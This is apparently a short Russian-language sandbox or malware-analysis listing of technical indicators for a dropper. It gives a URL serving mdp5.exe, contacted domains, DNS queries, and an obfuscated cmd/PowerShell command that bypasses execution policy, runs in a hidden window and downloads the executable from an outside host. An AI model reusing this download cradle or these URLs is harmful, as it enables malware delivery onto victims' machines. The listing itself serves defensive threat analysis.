Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^WE^RsheLL.EXe^ ^-ExEc^U^t^iO^NpOl^I^Cy bypaSs^ ^-^NoP^r^Of^IlE ^-^wInDOWs^tYL^E h^IDdE^n ^(New-oBjec^t s^Y^s^t^em.^net.^w^ebcLi^e^nT).d^oWnL^oa^dfIle('http://nexcontech.com/...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "pO^WE^RsheLL.EXe^ ^-ExEc^U^t^iO^NpOl^I^Cy bypaSs^ ^-^NoP^r^Of^IlE ^-^wInDOWs^tYL^E h^IDdE^n ^(New-oBjec^t s^Y^s^t^em.^net.^w^ebcLi^e^nT).d^oWnL^oa^dfIle('http://nexcontech.com/...' (со скрытым окном)